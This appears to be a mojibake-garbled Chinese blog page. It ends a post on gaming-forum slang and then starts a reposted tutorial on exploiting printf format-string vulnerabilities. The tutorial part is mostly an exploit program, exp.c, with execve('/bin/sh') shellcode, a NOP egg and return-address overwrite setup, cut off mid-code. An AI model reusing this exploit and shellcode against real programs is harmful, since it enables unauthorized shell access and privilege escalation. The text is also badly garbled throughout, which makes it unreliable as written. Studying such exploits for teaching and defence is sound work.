lame鐨勫師鎰忕殑鐦稿瓙錛屽紩鐢蟲(chóng)剰涔夋槸錛堝洜涓虹樃鎵浠ラ渶瑕侊級(jí)緇忓父鍊熷姪澶栧姏鐨勪漢銆傝繖璇嶅湪d2鏃舵湡涓撴寚鍦╨egit pvp room閲岃竟涓嶉伒瀹堢害瀹氫織鎴愮殑pvp瑙勫畾鑰屼嬌鐢ㄨ繚紱侀亾鍏風(fēng)殑浜恒傛瘮濡傝d2 usw realm閲寊ealot duel涓嶅噯鐢ㄥ噺閫熶笉鍑嗗枬鑽按涓嶅噯鐢╬d涓嶅噯鐢╢oh, 鐢ㄤ簡(jiǎn)榪欎簺鐨勫氨鏄痩amer銆傚湪wow forum涓婂鏋滆涓涓漢lame, 鍏舵剰鎬濅篃澶ц嚧鏄繖涓柟闈紝鑰屼笉涓瀹氭槸璇翠粬鍜岃姍钃夊濮愮瓑紲炴鏈変粈涔堢浉浼肩壒鐐廣?/font>

freak鐨勫嚭澶勬槸鏌愯憲鍚嶇騫誨皬璇寸浉淇″ぇ瀹墮兘鐭ラ亾浜?jiǎn)銆傚叾鍒嗚瘝褰㈡乫reaking鍜宖ucking鍦ㄥ仛璇皵寮鴻皟璇嶆柟闈㈠熀鏈笂鏄悓涔夌殑錛屼絾鏄畠鏈韓榪樻槸涓嶈劚紱誨叾鈥滄漢鈥濈殑鏈剰銆俧orums涓婄粡甯稿彲浠ョ湅鍒扮敤freak鍋氬畾璇殑鎯呭艦,姣斿褰㈠鏌愭onxy raid, 榫檓m鑰佹槸鍦ㄥぉ涓婁笉涓嬫潵, 灝卞彲浠ヨ"onxy's freak today she always refuses to land and yeild her due lewts before we wipe" 鑰宖uck鏄笉浼?xì)鎴愪负瀹氳鐨勩?/font>

moron鍜宺etarded鍦ㄦ湰鎰忎笂鏄悓涔夎瘝閮芥湁鐥村憜鏅洪殰鐨勬剰鎬濓紝浣唂orum涓婁嬌鐢ㄦ椂鏈夌偣宸埆銆俶oron鏇村己璋冧婦姝笂鎰氳牏鎴栨嚘寮? 姣斿璇存煇鏌愭嬁60綰уぇ鍙瘋媧梥tranglehorn鎴栨煇鏌愬湪bs琚晫瀵歸樀钀ユ潃浜?jiǎn)涓嬈″氨鍙緢澶氫漢鏉ュ府蹇欙紝鍙堟垨鑰呰涓?7173, 榪欐牱灝辨槸moron, 鑰宺etarded鍒欐洿涓昏璇存煇鏌愮殑琛屼負(fù)涓嶅彲鐞嗗柣銆傛瘮濡傛煇浜哄湪mage forum璐翠釜41鐐筧rcane緋葷殑澶╄祴灝變細(xì)琚漢璇存槸retarded, 浣嗕笉浼?xì)琚鎴愭槸moron銆?/font>



Asp 2006-10-31 23:35 鍙戣〃璇勮
]]>*printf()鏍煎紡鍖栦覆瀹夊叏婕忔礊鍒嗘瀽(涓? (杞?http://m.shnenglu.com/asp/archive/2006/10/20/13922.htmlAspAspFri, 20 Oct 2006 12:55:00 GMThttp://m.shnenglu.com/asp/archive/2006/10/20/13922.htmlhttp://m.shnenglu.com/asp/comments/13922.htmlhttp://m.shnenglu.com/asp/archive/2006/10/20/13922.html#Feedback0http://m.shnenglu.com/asp/comments/commentRss/13922.htmlhttp://m.shnenglu.com/asp/services/trackbacks/13922.html
錛堢戶緇級(jí)

閭d箞璁╂垜浠潵鍐欎竴涓畝鍗曠殑嫻嬭瘯紼嬪簭鏉ョ湅涓涓嬶細(xì)

<- begin ->聽(tīng) exp.c

#include <stdlib.h>聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
#include <unistd.h>聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
#define DEFAULT_OFFSET聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) 0聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
#define DEFAULT_ALIGNMENT聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) 2聽(tīng)聽(tīng)聽(tīng)聽(tīng) // 鎴戜滑浣跨敤涓や釜瀛楄妭鏉ヨ繘琛?瀵歸綈"
#define DEFAULT_RETLOC聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) 0xbffff6dc聽(tīng)聽(tīng)聽(tīng)聽(tīng) // 瀛樻斁main()榪斿洖鍦板潃鐨勫湴鍧聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
#define DEFAULT_BUFFER_SIZE聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) 512聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
#define DEFAULT_EGG_SIZE聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) 2048聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
#define NOP聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) 0x90聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
char shellcode[] =聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
聽(tīng) "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
聽(tīng) "\x80\xe8\xdc\xff\xff\xff/bin/sh";

聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
unsigned long get_esp(void) {聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng) __asm__("movl %esp,%eax");聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
}聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
main(int argc, char *argv[]) {聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) char *buff, *ptr, *egg;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) char *env[2];
聽(tīng) long shell_addr,retloc=DEFAULT_RETLOC;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) int offset=DEFAULT_OFFSET, align=DEFAULT_ALIGNMENT;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) int bsize=DEFAULT_BUFFER_SIZE, eggsize=DEFAULT_EGG_SIZE;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) int fmt_num=4, i;
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) if (argc > 1) sscanf(argv[1],"%x",&retloc); // 瀛樻斁main()榪斿洖鍦板潃鐨勫湴鍧聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) if (argc > 2) offset聽(tīng) = atoi(argv[2]);聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) if (argc > 3) align = atoi(argv[3]);聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) if (argc > 4) bsize聽(tīng)聽(tīng) = atoi(argv[4]);聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) if (argc > 5) eggsize = atoi(argv[5]);聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)

聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) printf("Usages: %s <RETloc> <offset> <align> <buffsize> <eggsize> \n",argv[0]);聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) if (!(buff = malloc(bsize))) {聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng) printf("Can't allocate memory.\n");聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng) exit(0);聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) }聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)

聽(tīng) if (!(egg = malloc(eggsize))) {聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng) printf("Can't allocate memory.\n");聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng) exit(0);聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) }聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)
聽(tīng) printf("Using Ret location address: 0x%x\n", retloc);聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) shell_addr = get_esp() + offset;聽(tīng)聽(tīng)聽(tīng) //璁$畻鎴戜滑shellcode鎵澶勭殑鍦板潃聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) printf("Using Shellcode address: 0x%x\n", shell_addr);
聽(tīng)
聽(tīng) ptr = buff;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) memset(buff,'A',4);

聽(tīng) i = align;
聽(tīng) buff[i]聽(tīng)聽(tīng) =聽(tīng) retloc & 0x000000ff;聽(tīng)聽(tīng) // 灝唕etloc鏀懼埌buff閲屄?tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)?
